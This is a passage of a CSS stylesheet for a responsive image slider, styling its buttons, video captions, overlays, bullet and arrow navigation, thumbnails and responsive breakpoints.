										border-left: 0px solid transparent;
										border-right: 40px solid transparent;
										border-top: 40px solid #00A8FF;
										position: absolute;right:0px;top:0px;
									}

/******************************
	-	BUTTONS	-
*******************************/

.tp-simpleresponsive .button				{	padding:6px 13px 5px; border-radius: 3px; -moz-border-radius: 3px; -webkit-border-radius: 3px; height:30px;
												cursor:pointer;
												color:#fff !important; text-shadow:0px 1px 1px rgba(0, 0, 0, 0.6) !important; font-size:15px; line-height:45px !important;
												background:url(../images/gradient/g30.png) repeat-x top; font-family: arial, sans-serif; font-weight: bold; letter-spacing: -1px;
											}

.tp-simpleresponsive  .button.big			{	color:#fff; text-shadow:0px 1px 1px rgba(0, 0, 0, 0.6); font-weight:bold; padding:9px 20px; font-size:19px;  line-height:57px !important; background:url(../images/gradient/g40.png) repeat-x top}


.tp-simpleresponsive  .purchase:hover,
.tp-simpleresponsive  .button:hover,
.tp-simpleresponsive  .button.big:hover		{	background-position:bottom, 15px 11px}



	@media only screen and (min-width: 768px) and (max-width: 959px) {

	 }



	@media only screen and (min-width: 480px) and (max-width: 767px) {
		.tp-simpleresponsive  .button	{	padding:4px 8px 3px; line-height:25px !important; font-size:11px !important;font-weight:normal;	}
		.tp-simpleresponsive  a.button { -webkit-transition: none; -moz-transition: none; -o-transition: none; -ms-transition: none;	 }


	}

    @media only screen and (min-width: 0px) and (max-width: 479px) {
		.tp-simpleresponsive  .button	{	padding:2px 5px 2px; line-height:20px !important; font-size:10px !important}
		.tp-simpleresponsive  a.button { -webkit-transition: none; -moz-transition: none; -o-transition: none; -ms-transition: none;	 }
	}





/*	BUTTON COLORS	*/



.tp-simpleresponsive  .button.green, .tp-simpleresponsive  .button:hover.green,
.tp-simpleresponsive  .purchase.green, .tp-simpleresponsive  .purchase:hover.green			{ background-color:#21a117; -webkit-box-shadow:  0px 3px 0px 0px #104d0b;        -moz-box-shadow:   0px 3px 0px 0px #104d0b;        box-shadow:   0px 3px 0px 0px #104d0b;  }


.tp-simpleresponsive  .button.blue, .tp-simpleresponsive  .button:hover.blue,
.tp-simpleresponsive  .purchase.blue, .tp-simpleresponsive  .purchase:hover.blue			{ background-color:#1d78cb; -webkit-box-shadow:  0px 3px 0px 0px #0f3e68;        -moz-box-shadow:   0px 3px 0px 0px #0f3e68;        box-shadow:   0px 3px 0px 0px #0f3e68}


.tp-simpleresponsive  .button.red, .tp-simpleresponsive  .button:hover.red,
.tp-simpleresponsive  .purchase.red, .tp-simpleresponsive  .purchase:hover.red				{ background-color:#cb1d1d; -webkit-box-shadow:  0px 3px 0px 0px #7c1212;        -moz-box-shadow:   0px 3px 0px 0px #7c1212;        box-shadow:   0px 3px 0px 0px #7c1212}

.tp-simpleresponsive  .button.orange, .tp-simpleresponsive  .button:hover.orange,
.tp-simpleresponsive  .purchase.orange, .tp-simpleresponsive  .purchase:hover.orange		{ background-color:#ff7700; -webkit-box-shadow:  0px 3px 0px 0px #a34c00;        -moz-box-shadow:   0px 3px 0px 0px #a34c00;        box-shadow:   0px 3px 0px 0px #a34c00}

.tp-simpleresponsive  .button.darkgrey, .tp-simpleresponsive  .button.grey,
.tp-simpleresponsive  .button:hover.darkgrey, .tp-simpleresponsive  .button:hover.grey,
.tp-simpleresponsive  .purchase.darkgrey, .tp-simpleresponsive  .purchase:hover.darkgrey	{ background-color:#555; -webkit-box-shadow:  0px 3px 0px 0px #222;        -moz-box-shadow:   0px 3px 0px 0px #222;        box-shadow:   0px 3px 0px 0px #222}

.tp-simpleresponsive  .button.lightgrey, .tp-simpleresponsive  .button:hover.lightgrey,
.tp-simpleresponsive  .purchase.lightgrey, .tp-simpleresponsive  .purchase:hover.lightgrey	{ background-color:#888; -webkit-box-shadow:  0px 3px 0px 0px #555;        -moz-box-shadow:   0px 3px 0px 0px #555;        box-shadow:   0px 3px 0px 0px #555}



/****************************************************************

	-	SET THE ANIMATION EVEN MORE SMOOTHER ON ANDROID   -

******************************************************************/

/*.tp-simpleresponsive				{	-webkit-perspective: 1500px;
										-moz-perspective: 1500px;
										-o-perspective: 1500px;
										-ms-perspective: 1500px;
										perspective: 1500px;
									}*/




/**********************************************
	-	FULLSCREEN AND FULLWIDHT CONTAINERS	-
**********************************************/

.fullscreen-container {
		width:100%;
		position:relative;
		padding:0;
}



.fullwidthbanner-container{
	width:100%;
	position:relative;
	padding:0;
	overflow:hidden;
}

.fullwidthbanner-container .fullwidthbanner{
	width:100%;
	position:relative;
}



/************************************************
	  - SOME CAPTION MODIFICATION AT START  -
*************************************************/
.tp-simpleresponsive .caption,
.tp-simpleresponsive .tp-caption {
	/*-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";		-moz-opacity: 0;	-khtml-opacity: 0;	opacity: 0; */
	position:absolute;visibility: hidden;
	-webkit-font-smoothing: antialiased !important;	
	
}

.tp-simpleresponsive img	{	max-width:none}



/******************************
	-	IE8 HACKS	-
*******************************/
.noFilterClass {
	filter:none !important;
}


/******************************
	-	SHADOWS		-
******************************/
.tp-bannershadow  {
		position:absolute;

		margin-left:auto;
		margin-right:auto;
		-moz-user-select: none;
        -khtml-user-select: none;
        -webkit-user-select: none;
        -o-user-select: none;
	}

.tp-bannershadow.tp-shadow1 {	background:url(../assets/shadow1.png) no-repeat; background-size:100% 100%; width:890px; height:60px; bottom:-60px}
.tp-bannershadow.tp-shadow2 {	background:url(../assets/shadow2.png) no-repeat; background-size:100% 100%; width:890px; height:60px;bottom:-60px}
.tp-bannershadow.tp-shadow3 {	background:url(../assets/shadow3.png) no-repeat; background-size:100% 100%; width:890px; height:60px;bottom:-60px}


/********************************
	-	FULLSCREEN VIDEO	-
*********************************/
.caption.fullscreenvideo {	left:0px; top:0px; position:absolute;width:100%;height:100%}
.caption.fullscreenvideo iframe,
.caption.fullscreenvideo video	{ width:100% !important; height:100% !important; display: none}

.tp-caption.fullscreenvideo	{	left:0px; top:0px; position:absolute;width:100%;height:100%}


.tp-caption.fullscreenvideo iframe,
.tp-caption.fullscreenvideo iframe video	{ width:100% !important; height:100% !important; display: none}


.fullcoveredvideo video,
.fullscreenvideo video					{	background: #000}

.fullcoveredvideo .tp-poster		{	background-position: center center;background-size: cover;width:100%;height:100%;top:0px;left:0px}

.html5vid.videoisplaying .tp-poster	{	display: none}

.tp-video-play-button		{	background:#000;
								background:rgba(0,0,0,0.3);
								padding:5px;
								border-radius:5px;-moz-border-radius:5px;-webkit-border-radius:5px;
								position: absolute;
								top: 50%;
								left: 50%;
								font-size: 40px;
								color: #FFF;
								z-index: 3;
								margin-top: -27px;
								margin-left: -28px;
								text-align: center;
								cursor: pointer;
							}

.html5vid .tp-revstop		{	width:15px;height:20px; border-left:5px solid #fff; border-right:5px solid #fff; position:relative;margin:10px 20px; box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box}
.html5vid .tp-revstop	{	display:none}
.html5vid.videoisplaying .revicon-right-dir	{	display:none}
.html5vid.videoisplaying .tp-revstop	{	display:block}

.html5vid.videoisplaying .tp-video-play-button	{	display:none}
.html5vid:hover .tp-video-play-button { display:block}

.fullcoveredvideo .tp-video-play-button	{	display:none !important}


/********************************
	-	FULLSCREEN VIDEO ENDS	-
*********************************/


/********************************
	-	DOTTED OVERLAYS	-
*********************************/
.tp-dottedoverlay						{	background-repeat:repeat;width:100%;height:100%;position:absolute;top:0px;left:0px;z-index:4}
.tp-dottedoverlay.twoxtwo				{	background:url(../assets/gridtile.png)}
.tp-dottedoverlay.twoxtwowhite			{	background:url(../assets/gridtile_white.png)}
.tp-dottedoverlay.threexthree			{	background:url(../assets/gridtile_3x3.png)}
.tp-dottedoverlay.threexthreewhite		{	background:url(../assets/gridtile_3x3_white.png)}
/********************************
	-	DOTTED OVERLAYS ENDS	-
*********************************/


/************************
	-	NAVIGATION	-
*************************/

/** BULLETS **/

.tpclear		{	clear:both}


.tp-bullets									{	z-index:1000; position:absolute;
												-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";
												-moz-opacity: 1;
												-khtml-opacity: 1;
												opacity: 1;
												-webkit-transition: opacity 0.2s ease-out; -moz-transition: opacity 0.2s ease-out; -o-transition: opacity 0.2s ease-out; -ms-transition: opacity 0.2s ease-out;-webkit-transform: translateZ(5px);
											}
.tp-bullets.hidebullets					{
												-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
												-moz-opacity: 0;
												-khtml-opacity: 0;
												opacity: 0;
											}


.tp-bullets.simplebullets.navbar						{ 	border:1px solid #666; border-bottom:1px solid #444; background:url(../assets/boxed_bgtile.png); height:40px; padding:0px 10px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px }

.tp-bullets.simplebullets.navbar-old					{ 	 background:url(../assets/navigdots_bgtile.png); height:35px; padding:0px 10px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px }


.tp-bullets.simplebullets.round .bullet					{	cursor:pointer; position:relative;	background:url(../images/bullet.png) no-Repeat top left;	width:20px;	height:20px;  margin-right:0px; float:left; margin-top:0px; margin-left:3px}
.tp-bullets.simplebullets.round .bullet.last			{	margin-right:3px}

.tp-bullets.simplebullets.round-old .bullet				{	cursor:pointer; position:relative;	background:url(../images/bullets.png) no-Repeat bottom left;	width:23px;	height:23px;  margin-right:0px; float:left; margin-top:0px}
.tp-bullets.simplebullets.round-old .bullet.last		{	margin-right:0px}


/**	SQUARE BULLETS **/
.tp-bullets.simplebullets.square .bullet				{	cursor:pointer; position:relative;	background:url(../images/bullets2.png) no-Repeat bottom left;	width:19px;	height:19px;  margin-right:0px; float:left; margin-top:0px}
.tp-bullets.simplebullets.square .bullet.last			{	margin-right:0px}


/**	SQUARE BULLETS **/
.tp-bullets.simplebullets.square-old .bullet			{	cursor:pointer; position:relative;	background:url(../images/bullets2.png) no-Repeat bottom left;	width:19px;	height:19px;  margin-right:0px; float:left; margin-top:0px}
.tp-bullets.simplebullets.square-old .bullet.last		{	margin-right:0px}


/** navbar NAVIGATION VERSION **/
.tp-bullets.simplebullets.navbar .bullet			{	cursor:pointer; position:relative;	background:url(../images/bullet_boxed.png) no-Repeat top left;	width:18px;	height:19px;   margin-right:5px; float:left; margin-top:0px}

.tp-bullets.simplebullets.navbar .bullet.first		{	margin-left:0px !important}
.tp-bullets.simplebullets.navbar .bullet.last		{	margin-right:0px !important}



/** navbar NAVIGATION VERSION **/
.tp-bullets.simplebullets.navbar-old .bullet			{	cursor:pointer; position:relative;	background:url(../assets/navigdots.png) no-Repeat bottom left;	width:15px;	height:15px;  margin-left:5px !important; margin-right:5px !important;float:left; margin-top:10px}
.tp-bullets.simplebullets.navbar-old .bullet.first		{	margin-left:0px !important}
.tp-bullets.simplebullets.navbar-old .bullet.last		{	margin-right:0px !important}


.tp-bullets.simplebullets .bullet:hover,
.tp-bullets.simplebullets .bullet.selected				{	background-position:top left}

.tp-bullets.simplebullets.round .bullet:hover,
.tp-bullets.simplebullets.round .bullet.selected,
.tp-bullets.simplebullets.navbar .bullet:hover,
.tp-bullets.simplebullets.navbar .bullet.selected		{	background-position:bottom left}



/*************************************
	-	TP ARROWS 	-
**************************************/
.tparrows												{	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";
															-moz-opacity: 1;
															-khtml-opacity: 1;
															opacity: 1;
															-webkit-transition: opacity 0.2s ease-out; -moz-transition: opacity 0.2s ease-out; -o-transition: opacity 0.2s ease-out; -ms-transition: opacity 0.2s ease-out;
															-webkit-transform: translateZ(5000px);
															-webkit-transform-style: flat;
															-webkit-backface-visibility: hidden;
															z-index:600;
															position: relative;

														}
.tparrows.hidearrows									{
															-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";
															-moz-opacity: 0;
															-khtml-opacity: 0;
															opacity: 0;
														}
.tp-leftarrow{	
	z-index:100;cursor:pointer; position:relative;	
	background:url(../assets/large_left.png) no-Repeat top left;	
	width:40px;	height:40px;   
}
.tp-rightarrow	{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/large_right.png) no-Repeat top left;	width:40px;	height:40px;   }


.tp-leftarrow.round										{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/small_left.png) no-Repeat top left;	width:19px;	height:14px;  margin-right:0px; float:left; margin-top:0px;	}
.tp-rightarrow.round									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/small_right.png) no-Repeat top left;	width:19px;	height:14px;  margin-right:0px; float:left;	margin-top:0px}


.tp-leftarrow.round-old									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_left.png) no-Repeat top left;	width:26px;	height:26px;  margin-right:0px; float:left; margin-top:0px;	}
.tp-rightarrow.round-old								{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_right.png) no-Repeat top left;	width:26px;	height:26px;  margin-right:0px; float:left;	margin-top:0px}


.tp-leftarrow.navbar									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/small_left_boxed.png) no-Repeat top left;	width:20px;	height:15px;   float:left;	margin-right:6px; margin-top:12px}
.tp-rightarrow.navbar									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/small_right_boxed.png) no-Repeat top left;	width:20px;	height:15px;   float:left;	margin-left:6px; margin-top:12px}


.tp-leftarrow.navbar-old{	
	z-index:100;cursor:pointer; position:relative;	
	background:url(../assets/arrowleft.png) no-Repeat top left;		
	width:9px;	height:16px;   float:left;	margin-right:6px; margin-top:10px}
.tp-rightarrow.navbar-old{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrowright.png) no-Repeat top left;	width:9px;	height:16px;   float:left;	margin-left:6px; margin-top:10px}

.tp-leftarrow.navbar-old.thumbswitharrow				{	margin-right:10px}
.tp-rightarrow.navbar-old.thumbswitharrow				{	margin-left:0px}

.tp-leftarrow.square									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_left2.png) no-Repeat top left;	width:12px;	height:17px;   float:left;	margin-right:0px; margin-top:0px}
.tp-rightarrow.square									{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_right2.png) no-Repeat top left;	width:12px;	height:17px;   float:left;	margin-left:0px; margin-top:0px}


.tp-leftarrow.square-old								{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_left2.png) no-Repeat top left;	width:12px;	height:17px;   float:left;	margin-right:0px; margin-top:0px}
.tp-rightarrow.square-old								{	z-index:100;cursor:pointer; position:relative;	background:url(../assets/arrow_right2.png) no-Repeat top left;	width:12px;	height:17px;   float:left;	margin-left:0px; margin-top:0px}


.tp-leftarrow.default{	
	z-index:100;cursor:pointer; position:relative;	
	background: url(../images/prev-blue.png) no-Repeat 0 0;	
	width:57px;	height:50px;
	
	-webkit-transition: all 200ms linear;
   -moz-transition: all 200ms linear;
	-ms-transition: all 200ms linear;
   -o-transition:all 200ms linear;
	transition:all 200ms linear;
}
.tp-rightarrow.default{	
	z-index:100;cursor:pointer; position:relative;	
	background:url(../images/next-blue.png) no-Repeat 0 0;	
	width:57px;	height:50px;
	
	-webkit-transition: all 200ms linear;
   -moz-transition: all 200ms linear;
	-ms-transition: all 200ms linear;
   -o-transition:all 200ms linear;
	transition:all 200ms linear;
}

#index_3_slider .tp-leftarrow.default{
	background: url(../images/prev-dark.png) no-Repeat 0 0;
}
#index_3_slider .tp-rightarrow.default{		
	background:url(../images/next-dark.png) no-Repeat 0 0;	
}


.tp-leftarrow:hover,
.tp-rightarrow:hover,
#index_3_slider .tp-leftarrow:hover,
#index_3_slider .tp-rightarrow:hover {	
	background-position:bottom left;
}






/****************************************************************************************************
	-	TP THUMBS 	-
*****************************************************************************************************

 - tp-thumbs & tp-mask Width is the width of the basic Thumb Container (500px basic settings)

 - .bullet width & height is the dimension of a simple Thumbnail (basic 100px x 50px)

 *****************************************************************************************************/


.tp-bullets.tp-thumbs						{	z-index:1000; position:absolute; padding:3px;background-color:#fff;
												width:500px;height:50px; 			/* THE DIMENSIONS OF THE THUMB CONTAINER */
												margin-top:-50px;
											}


.fullwidthbanner-container .tp-thumbs		{  padding:3px}

.tp-bullets.tp-thumbs .tp-mask				{	width:500px; height:50px;  			/* THE DIMENSIONS OF THE THUMB CONTAINER */
												overflow:hidden; position:relative}


.tp-bullets.tp-thumbs .tp-mask .tp-thumbcontainer	{	width:5000px; position:absolute}

.tp-bullets.tp-thumbs .bullet				{   width:100px; height:50px; 			/* THE DIMENSION OF A SINGLE THUMB */
												cursor:pointer; overflow:hidden;background:none;margin:0;float:left;
												-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=50)";
												/*filter: alpha(opacity=50);	*/
												-moz-opacity: 0.5;
												-khtml-opacity: 0.5;
												opacity: 0.5;

												-webkit-transition: all 0.2s ease-out; -moz-transition: all 0.2s ease-out; -o-transition: all 0.2s ease-out; -ms-transition: all 0.2s ease-out;
											}


.tp-bullets.tp-thumbs .bullet:hover,
.tp-bullets.tp-thumbs .bullet.selected		{ 	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";

												-moz-opacity: 1;
												-khtml-opacity: 1;
												opacity: 1;
											}
.tp-thumbs img								{	width:100%}


/************************************
		-	TP BANNER TIMER		-
*************************************/
.tp-bannertimer								{	width:100%; height:10px; /*background:url(../images/timer.png);*/position:absolute; z-index:200;top:0px}
.tp-bannertimer.tp-bottom					{	bottom:0px;height:5px; top:auto}




/***************************************
	-	RESPONSIVE SETTINGS 	-
****************************************/




    @media only screen and (min-width: 0px) and (max-width: 479px) {
				.responsive .tp-bullets	{	display:none}
				.responsive .tparrows	{	display:none}
	}





/*********************************************

	-	BASIC SETTINGS FOR THE BANNER	-

***********************************************/

 .tp-simpleresponsive img {
		-moz-user-select: none;
        -khtml-user-select: none;
        -webkit-user-select: none;
        -o-user-select: none;
}



.tp-simpleresponsive a{	text-decoration:none}

.tp-simpleresponsive ul {
	list-style:none;
	padding:0;
	margin:0;
}

.tp-simpleresponsive >ul >li{
	list-stye:none;
	position:absolute;
	visibility:hidden;
}
/*  CAPTION SLIDELINK   **/
.caption.slidelink a div,
.tp-caption.slidelink a div {	width:3000px; height:1500px;  background:url(../assets/coloredbg.png) repeat}

.tp-caption.slidelink a span	{	background:url(../assets/coloredbg.png) repeat}



/*****************************************
	-	NAVIGATION FANCY EXAMPLES	-
*****************************************/

.tparrows .tp-arr-imgholder								{ display: none}
.tparrows .tp-arr-titleholder							{ display: none}



/*****************************************
	-	NAVIGATION FANCY EXAMPLES	-
*****************************************/

/* NAVIGATION PREVIEW 1 */
.tparrows.preview1 							{	width:100px;height:100px;-webkit-transform-style: preserve-3d; -webkit-perspective: 1000; -moz-perspective: 1000; -webkit-backface-visibility: hidden; -moz-backface-visibility: hidden;background: transparent}
.tparrows.preview1:after					{	position:absolute; left:0px;top:0px; font-family: "revicons"; color:#fff; font-size:30px; width:100px;height:100px;text-align: center; background:#fff;background:rgba(0,0,0,0.15);z-index:2;line-height:100px; -webkit-transition: background 0.3s, color 0.3s; -moz-transition: background 0.3s, color 0.3s; transition: background 0.3s, color 0.3s}
.tp-rightarrow.preview1:after				{	content: '\e825';  }
.tp-leftarrow.preview1:after				{	content: '\e824';  }

.tparrows.preview1:hover:after 				{	background:rgba(255,255,255,1); color:#aaa}

.tparrows.preview1 .tp-arr-imgholder 		{	background-size:cover; background-position:center center; display:block;width:100%;height:100%;position:absolute;top:0px;
												-webkit-transition: -webkit-transform 0.3s;
												transition: transform 0.3s;
												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;
											}
/*.tparrows.preview1 .tp-arr-iwrapper			{	  -webkit-transition: all 0.3s;transition: all 0.3s;
												-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter: alpha(opacity=0);-moz-opacity: 0.0;-khtml-opacity: 0.0;opacity: 0.0}
.tparrows.preview1:hover .tp-arr-iwrapper	{	  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";filter: alpha(opacity=100);-moz-opacity: 1;-khtml-opacity: 1;opacity: 1}*/


.tp-rightarrow.preview1 .tp-arr-imgholder	{	right:100%;
												-webkit-transform: rotateY(-90deg);
												transform: rotateY(-90deg);
												-webkit-transform-origin: 100% 50%;
												transform-origin: 100% 50%;
												  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter: alpha(opacity=0);-moz-opacity: 0.0;-khtml-opacity: 0.0;opacity: 0.0;



											}
.tp-leftarrow.preview1 .tp-arr-imgholder	{	left:100%;
												-webkit-transform: rotateY(90deg);
												transform: rotateY(90deg);
												-webkit-transform-origin: 0% 50%;
												transform-origin: 0% 50%;
												  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";filter: alpha(opacity=0);-moz-opacity: 0.0;-khtml-opacity: 0.0;opacity: 0.0;



											}


.tparrows.preview1:hover .tp-arr-imgholder	{	-webkit-transform: rotateY(0deg);
												transform: rotateY(0deg);
												  -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";filter: alpha(opacity=100);-moz-opacity: 1;-khtml-opacity: 1;opacity: 1;

											}


	@media only screen and (min-width: 768px) and (max-width: 979px) {
		.tparrows.preview1,
		.tparrows.preview1:after	{	width:80px; height:80px;line-height:80px; font-size:24px}

	}

    @media only screen and (min-width: 480px) and (max-width: 767px) {
		.tparrows.preview1,
		.tparrows.preview1:after	{	width:60px; height:60px;line-height:60px;font-size:20px}

	}



    @media only screen and (min-width: 0px) and (max-width: 479px) {
		.tparrows.preview1,
		.tparrows.preview1:after	{	width:40px; height:40px;line-height:40px; font-size:12px}
    }

/* PREVIEW 1 BULLETS */

.tp-bullets.preview1 						{ 	height: 21px}
.tp-bullets.preview1 .bullet 				{	cursor: pointer;
											    position: relative !important;
											    background: rgba(0, 0, 0, 0.15) !important;
											    /*-webkit-border-radius: 10px;
											    border-radius: 10px;*/
											    -webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
											    width: 5px !important;
											    height: 5px !important;
											    border: 8px solid rgba(0, 0, 0, 0) !important;
											    display: inline-block;
											    margin-right: 5px !important;
											    margin-bottom: 0px !important;
											    -webkit-transition: background-color 0.2s, border-color 0.2s;
											    -moz-transition: background-color 0.2s, border-color 0.2s;
											    -o-transition: background-color 0.2s, border-color 0.2s;
											    -ms-transition: background-color 0.2s, border-color 0.2s;
											    transition: background-color 0.2s, border-color 0.2s;
											    float:none !important;
											    box-sizing:content-box;
												-moz-box-sizing:content-box;
												-webkit-box-sizing:content-box;
}
.tp-bullets.preview1 .bullet.last 			{	margin-right: 0px}
.tp-bullets.preview1 .bullet:hover,
.tp-bullets.preview1 .bullet.selected 		{	-webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
												background: #aaa !important;
												width: 5px !important;
											    height: 5px !important;
											    border: 8px solid rgba(255, 255, 255, 1) !important;
}




/* NAVIGATION PREVIEW 2 */
.tparrows.preview2 {	
	min-width:50px; 
	min-height:50px;
	border:1px solid #fff;  
	-webkit-transition: -webkit-transform 1.3s;
	-webkit-transition: width 0.3s, background-color 0.3s, opacity 0.3s;
	transition: width 0.3s, background-color 0.3s, opacity 0.3s;
}
.tparrows.preview2:after{	
	 position:absolute; 
	 top:50%;
	 font-family:'FontAwesome'; 
	 color:#fff;  
	 margin-top: -12px; 
	 -webkit-transition: color 0.3s; 
	 -moz-transition: color 0.3s; 
	 transition: color 0.3s; 
}
.tp-rightarrow.preview2:after	{content: '\f178';  right:18px}
.tp-leftarrow.preview2:after{content: '\f177';  left:18px}


/*.tparrows.preview2 .tp-arr-titleholder{	
	background-size:cover; background-position:center center; display:block; visibility:hidden;position:relative;top:0px;
												-webkit-transition: -webkit-transform 0.3s;
												transition: transform 0.3s;
												-webkit-backface-visibility: hidden;
												backface-visibility: hidden;
												white-space: nowrap;
												color: #000;
												text-transform: uppercase;
												font-weight: 400;
												font-size: 14px;
												line-height: 60px;
												padding:0px 10px;
											}

.tp-rightarrow.preview2 .tp-arr-titleholder	{	 right:50px;
												-webkit-transform: translateX(-100%);
												transform: translateX(-100%);
											}
.tp-leftarrow.preview2 .tp-arr-titleholder	{	left:50px;
												-webkit-transform: translateX(100%);
												transform: translateX(100%);
											}*/

.tparrows.preview2.hovered{}
.tparrows.preview2:hover{	
	background:#07aaa5; 
	border:1px solid #07aaa5; 
}
.tparrows.preview2:hover:after{
	color:#fff;
}
/*.tparrows.preview2:hover .tp-arr-titleholder{	-webkit-transform: translateX(0px);
													transform: translateX(0px);
													visibility: visible;
													position: absolute;
											}*/
											
											
											

/* PREVIEW 2 BULLETS */

.tp-bullets.preview2 						{ 	height: 17px; display:none;}
.tp-bullets.preview2 .bullet 				{	cursor: pointer;
											    position: relative !important;
											    background: rgba(0, 0, 0, 0.5) !important;
											    -webkit-border-radius: 10px;
											    border-radius: 10px;
											    -webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
											    width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 0) !important;
											    display: inline-block;
											    margin-right: 2px !important;
											    margin-bottom: 0px !important;
											    -webkit-transition: background-color 0.2s, border-color 0.2s;
											    -moz-transition: background-color 0.2s, border-color 0.2s;
											    -o-transition: background-color 0.2s, border-color 0.2s;
											    -ms-transition: background-color 0.2s, border-color 0.2s;
											    transition: background-color 0.2s, border-color 0.2s;
											    float:none !important;
											    box-sizing:content-box;
												-moz-box-sizing:content-box;
												-webkit-box-sizing:content-box;
}
.tp-bullets.preview2 .bullet.last 			{	margin-right: 0px}
.tp-bullets.preview2 .bullet:hover,
.tp-bullets.preview2 .bullet.selected 		{	-webkit-box-shadow: none;
											    -moz-box-shadow: none;
											    box-shadow: none;
												background: rgba(255, 255, 255, 1) !important;
												width: 6px !important;
											    height: 6px !important;
											    border: 5px solid rgba(0, 0, 0, 1) !important;
}

.tp-arr-titleholder.alwayshidden			{	display:none !important}


	@media only screen and (min-width: 768px) and (max-width: 979px) {
		.tparrows.preview2 {	min-width:40px; min-height:40px; width:40px;height:40px;
								border-radius:20px;-moz-border-radius:20px;-webkit-border-radius:20px;
							}
		.tparrows.preview2:after					{	position:absolute; top:50%; font-family: "revicons"; font-size:20px; margin-top: -12px}
		.tp-rightarrow.preview2:after				{	content: '\e81e';  right:11px}
		.tp-leftarrow.preview2:after				{	content: '\e81f';  left:11px}
		.tparrows.preview2 .tp-arr-titleholder		{	font-size:12px; line-height:40px; letter-spacing: 0px}
		.tp-rightarrow.preview2 .tp-arr-titleholder	{	right:35px}
		.tp-leftarrow.preview2 .tp-arr-titleholder	{	left:35px}

	}

    @media only screen and (min-width: 480px) and (max-width: 767px) {
   		 .tparrows.preview2 						{	min-width:30px; min-height:30px; width:30px;height:30px;
														border-radius:15px;-moz-border-radius:15px;-webkit-border-radius:15px;
													}
		.tparrows.preview2:after					{	position:absolute; top:50%; font-family: "revicons"; font-size:14px; margin-top: -12px}
		.tp-rightarrow.preview2:after				{	content: '\e81e';  right:8px}
		.tp-leftarrow.preview2:after				{	content: '\e81f';  left:8px}
		.tparrows.preview2 .tp-arr-titleholder		{	font-size:10px; line-height:30px; letter-spacing: 0px}
		.tp-rightarrow.preview2 .tp-arr-titleholder	{	right:25px}
		.tp-leftarrow.preview2 .tp-arr-titleholder	{	left:25px}
		.tparrows.preview2 .tp-arr-titleholder		{	display:none;visibility:none}


	}

    @media only screen and (min-width: 0px) and (max-width: 479px) {
		.tparrows.preview2 							{	min-width:30px; min-height:30px; width:30px;height:30px;
														border-radius:15px;-moz-border-radius:15px;-webkit-border-radius:15px;
													}
		.tparrows.preview2:after					{	position:absolute; top:50%; font-family: "revicons"; font-size:14px; margin-top: -12px}
		.tp-rightarrow.preview2:after				{	content: '\e81e';  right:8px}
		.tp-leftarrow.preview2:after				{	content: '\e81f';  left:8px}
		.tparrows.preview2 .tp-arr-titleholder		{	display:none;visibility:none}
		.tparrows.preview2:hover					{	width:30px !important; height:30px !important}
    }



/* NAVIGATION PREVIEW 3 */
.tparrows.preview3 							{	width:70px; height:70px; background:#fff; background:rgba(255,255,255,1); -webkit-transform-style: flat}
.tparrows.preview3:after					{	position:absolute;  line-height: 70px;text-align: center; font-family: "revicons"; color:#aaa; font-size:30px; top:0px;left:0px;;background:#fff; z-index:100; width:70px;height:70px; -webkit-transition: color 0.3s; -moz-transition: color 0.3s; transition: color 0.3s}
.tparrows.preview3:hover:after					{	color:#000}
.tp-rightarrow.preview3:after				{	content: '\e825';  }
.tp-leftarrow.preview3:after				{	content: '\e824';  }


.tparrows.preview3 .tp-arr-iwrapper			{
												  -webkit-transform: scale(0,1);
												  transform: scale(0,1);
												  -webkit-transform-origin: 100% 50%;
												  transform-origin: 100% 50%;
												  -webkit-transition: -webkit-transform 0.2s;
												  transition: transform 0.2s;
												  z-index:0;position: absolute; background: #000; background: rgba(0,0,0,0.75);
												  display: table;min-height:90px;top:-10px}

.tp-leftarrow.preview3 .tp-arr-iwrapper		{	 -webkit-transform: scale(0,1);
												  transform: scale(0,1);
												  -webkit-transform-origin: 0% 50%;
												  transform-origin: 0% 50%;
											}

.tparrows.preview3 .tp-arr-imgholder 		{	display:block;background-size:cover; background-position:center center; display:table-cell;min-width:90px;height:90px;
												position:relative;top:0px}

.tp-rightarrow.preview3 .tp-arr-iwrapper	{	right:0px;padding-right:70px}
.tp-leftarrow.preview3 .tp-arr-iwrapper		{	left:0px; direction: rtl;padding-left:70px}
.tparrows.preview3 .tp-arr-titleholder		{	display:table-cell; padding:30px;font-size:16px; color:#fff;white-space: nowrap; position: relative; clear:right;vertical-align: middle}

.tparrows.preview3:hover .tp-arr-iwrapper	{
												-webkit-transform: scale(1,1);
												  transform: scale(1,1);

											}

/* PREVIEW 3 BULLETS */
.tp-bullets.preview3 						{ 	height: 17px}
